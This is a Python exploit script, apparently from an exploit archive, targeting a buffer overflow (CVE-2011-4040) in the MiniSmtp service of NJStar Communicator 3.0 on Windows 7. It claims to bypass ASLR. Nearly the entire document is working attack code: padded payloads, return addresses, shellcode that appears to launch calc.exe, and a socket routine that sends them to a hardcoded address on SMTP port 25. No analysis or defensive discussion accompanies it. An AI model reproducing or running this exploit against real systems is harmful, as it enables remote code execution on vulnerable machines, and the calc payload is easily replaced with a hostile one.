NJStar Communicator 3.0 MiniSmtp Buffer Overflow

`# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]  
# Date: 02/12/11  
# Author: Zune - Julian Pulido  
# Software Link: http://www.njstar.com/download/njcom.exe  
# Version: 3.0  
# Build: 11818 and previous   
# Tested on: Windows 7 Ultimate  
# CVE:2011-4040  
  
  
#! /usr/local/bin/python  
  
import socket  
import time  
  
carriage= chr(0xd)  
#######################################  
Padding1= chr(0x31)* 275  
Jump= '\x8d\x44\x24\x80\xff\xe0\x90\x90'  
Junk1= chr(0x90)* 4  
return1= '\x2d\x12\x41' # pop retn  
egg1= Padding1+Jump+Junk1+return1+carriage  
  
#######################################  
Padding2= chr(0x32)* 271  
return2= '\x2b\x12\x41' # pop pop pop retn  
egg2= Padding2+return2+carriage  
  
#######################################  
Padding3= chr(0x33) * 263  
return3= '\x2d\x12\x41' # pop retn  
egg3= Padding3+return3+carriage  
  
#######################################  
Padding4= chr(0x34) * 171  
Padding5= chr(0x34) * 22  
ShellCode = "\xC7\x43\x20\x63\x61\x6C\x63\xC7\x43\x24\x2E\x65\x78\x65\x33\xC0\  
\x66\xB8\x1A\x08\xC1\xE0\x08\xB0\x79\x03\xE8\x8D\x43\x20\x33\xC9\xB1\x01\xC1\  
\xC1\x0C\x2B\xE1\x6A\x05\x50\xFF\xD5\x8D\x85\x85\x44\xF8\xFF\x6A\x01\xFF\xD0"  
  
return4= '\x2b\x12\x41' # pop pop pop retn  
egg4= Padding4+ShellCode+Padding5+return4+carriage  
  
#######################################  
  
def Send_SMTP (egg):  
connectionx.send(egg +'\n')  
time.sleep(2)  
  
connectionx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
print "Exploit NJStar Communicator 3.0 MiniSmtp by Zune\n"  
print "Windows 7 Ultimate [ASLR Bypass]"  
try:  
connectionx.connect(("192.168.1.65",25))#SMTP port 25  
Send_SMTP(egg1)  
Send_SMTP(egg2)  
Send_SMTP(egg3)  
Send_SMTP(egg4)  
connectionx.close()  
except socket.error:  
print "it couldn't connect"  
time.sleep(2)  
  
  
  
`